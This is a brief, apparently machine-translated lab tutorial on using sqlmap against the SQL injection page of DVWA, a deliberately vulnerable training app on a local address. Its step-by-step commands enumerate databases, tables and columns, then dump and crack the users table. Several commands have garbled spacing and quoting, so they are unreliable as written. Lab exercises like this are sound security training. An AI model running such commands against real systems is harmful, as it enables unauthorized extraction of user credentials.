1 using Sqlmap to inject DVWA SQL injection Menu
The login address in this tutorial: http://192.168.0.112/dvwa/login.php
1.1 Getting cookie Information
1) Use the Admin/password login system to obtain cookie information via the Firebug tool.
The cookie information obtained is as follows:
Security=low; path=/dvwa/; domain=192.168.0.112
phpsessid=0bec860709d15f590768b7713c69b52f; path=/; domain=192.168.0.112
2) Get the URL to test
Click the SQL Injection menu, enter AA in the User ID input box, and click the Submit button. The URL to be tested is obtained through the Firebug tool as follows: http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#
3) Use Sqlmap to test the URL for SQL injection vulnerability
Execute the following command: [email protected]:~# sqlmap-u ' http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit# '-- Cookie= ' Security=low; phpsessid=0bec860709d15f590768b7713c69b52f '
4) detect the name of the database in MySQL that is used to store application data
Execute the following command: [email protected]:~# sqlmap-u ' http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit# '-- Cookie= ' Security=low; phpsessid=0bec860709d15f590768b7713c69b52f '--dbs-v 0
5) Query the name of the table that exists in the DVWA database
Execute the following command: [email protected]:~# [Email protected]:~# sqlmap-u ' Http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa &submit=submit# '--cookie= ' security=low; phpsessid=0bec860709d15f590768b7713c69b52f '-D dvwa--tables
6) Get the list of fields in the Users table
Execute the following command: [email protected]:~# sqlmap-u ' http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit# '-- Cookie= ' Security=low; phpsessid=0bec860709d15f590768b7713c69b52f '-D dvwa--tables-t users--columns
7) Exporting the Users table
Execute the following command: [email protected]:~# sqlmap-u ' http://192.168.0.112/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit# '-- Cookie= ' Security=low; phpsessid=0bec860709d15f590768b7713c69b52f '-D dvwa--tables-t users--columns--dump
All the way y down, unexpectedly to the database of ciphertext password also to decipher.
Download Users.csv According to the prompt path
Using Sqlmap to inject DVWA SQL injection Menu